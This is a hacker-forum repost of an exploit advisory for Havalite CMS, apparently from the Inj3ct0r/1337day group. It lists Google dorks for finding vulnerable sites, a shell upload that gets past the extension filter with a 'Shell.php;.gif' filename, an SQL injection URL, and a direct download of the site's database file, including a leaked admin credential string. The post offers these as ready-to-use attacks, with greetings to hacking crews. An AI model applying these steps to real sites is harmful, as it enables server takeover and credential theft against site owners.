Havalite CMS Shell Upload / SQL Injection / Disclosure

Bensaw

Üye
24 Ocak 2012
62
0
İstanbul
Kod:
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm KedAns-Dz member from Inj3ct0r Team                1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 

### 
# Title : Havalite CMS latest (FU/SQLi/dCDB) Mutiple Vulnerabilities 
# Author : KedAns-Dz 
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) [email protected] 
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701) 
# Web Site : www.1337day.com 
# Facebook : http://facebook.com/KedAns 
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com 
# platform : php 
# Type : Multiple Vulnerabilities 
# Security Risk : Critical 
# Tested on : Windows XP-SP3 (Fr) / FreeBSD 8.2-RC 
### 

## 
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << | 
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   | 
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * soucha | 
# | ***** KinG Of PiraTeS * The g0bl!n * dr.R!dE  ***** | 
# | ------------------------------------------------- < | 
## 

./<3 <3 Greetings t0 Palestine <3 <3 

# Download CMS : http://havalite.com/havalite/plugins/download_counter/download.php?d=havalite.zip 

####[ p0c 1 | File/Shell Upload : ]===> 

+> Dork : "allinurl:/hava_upload.php" 

+> Exploit : 
http://[target]/[path]/hava_upload.php 

-> Upload Shell.php;.gif  
... and Find him : http://[target]/[path]/tmp/files/Shell.php;.gif 

####[ p0c 2 | SQL Inj3ction : ]===> 

+> No d0rk K!dd's :p 

+> Exploit :  
http://[target]/[path]/hava_post.php?postId=9999' [ SQLi ] 

####[ p0c 3 | Download CONFIG Database : ]===> 

+> Dork : "allinurl:/data/havalite.db3" 

+> Exploit : http://[target]/[path]/data/havalite.db3 

+> p0c Inf0s : 

config.php => 

line 1/4 : 
<?php 
$dbPath = 'havalite.db3'; 
$activeHavalite = true; 
?> 

-> havalite.db3 : 

line 16 : 

admin43175836dbb2237 

# The EnD ./ Greetings t0 palestine ./ ^__^ Like aNd Inj0Y 

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]======================================= 
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Rizky Ariestiyansyah * Islam Caddy * HMD-Cr3w 
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)  
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * 
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta 
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X 
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * r00tw0rm.com  
# www.packetstormsecurity.org * www.****sploit.com * I-BT * Dis9UE * All Security and Exploits Webs .. 
#===================================================================================================
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.